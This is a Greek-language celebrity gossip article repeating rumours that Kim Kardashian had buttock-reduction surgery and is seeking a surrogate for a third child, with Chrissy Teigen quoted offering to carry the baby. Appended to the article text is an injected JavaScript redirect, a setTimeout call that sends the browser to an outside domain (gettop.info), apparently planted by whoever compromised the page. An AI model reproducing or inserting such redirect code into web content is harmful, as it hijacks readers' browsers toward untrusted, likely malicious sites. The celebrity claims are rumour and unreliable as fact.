Πάει για τρίτο παιδί η Κιμ Καρντάσιαν (EIKONA)

0
52

 

Σε πλαστική επέμβαση για τη μείωση των διάσημων οπισθίων της φέρεται να προχώρησε η διάσημη τηλεπερσόνα Κιμ Καρντάσιαν σε αντίθεση με την αδερφή της Κλόε που έκανε αυξητική!

Οι φαν της Κιμ σχολίασαν πως οι γλουτοί της φαίνονται πιο μικροί από ποτέ πυροδοτώντας φήμες για πλαστική επέμβαση. Μάλιστα, αναφέρεται πως γι αυτό απείχε τόσο καιρό από τη δημοσιότητα γιατί υποβλήθηκε στην επέμβαση.

 

Από την άλλη δημοσιοποιήθηκε πως επιθυμεί διακαώς να αποκτήσει τρίτο παιδί, αλλά αυτήν τη φορά δεν προτίθεται να περάσει όλη την ταλαιπωρία μίας εγκυμοσύνης, με την αύξηση βάρους, την ειδική διατροφή και την ανάλογη γυμναστική. Αντιθέτως, αναζητεί παρένθετη μητέρα και μάλιστα είχε ήδη μία πρόταση από την Κρίσι Τέινγκεν, που μόλις απέκτησε το παιδάκι της και απόλαυσε την εγκυμοσύνη της. Όπως είπε η ίδια η παρουσιάστρια και φίλη της τηλεπερσόνας «θα γινόμουν παρένθετη μητέρα για να αποκτήσει ένα ακόμη παιδάκι. Διασκέδασα πολύ τη διαδικασία της εγκυμοσύνης την πρώτη φορά και με χαρά θα το έκανα και πάλι, αν αυτό θα δώσει χαρά στην Kim. Η επιστήμη πια κάνει θαύματα και ο,τιδήποτε και αν κάνει η Kim, θα δουλέψει γιατί είναι για καλό και είνα μία πολύ όμορφη πράξη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here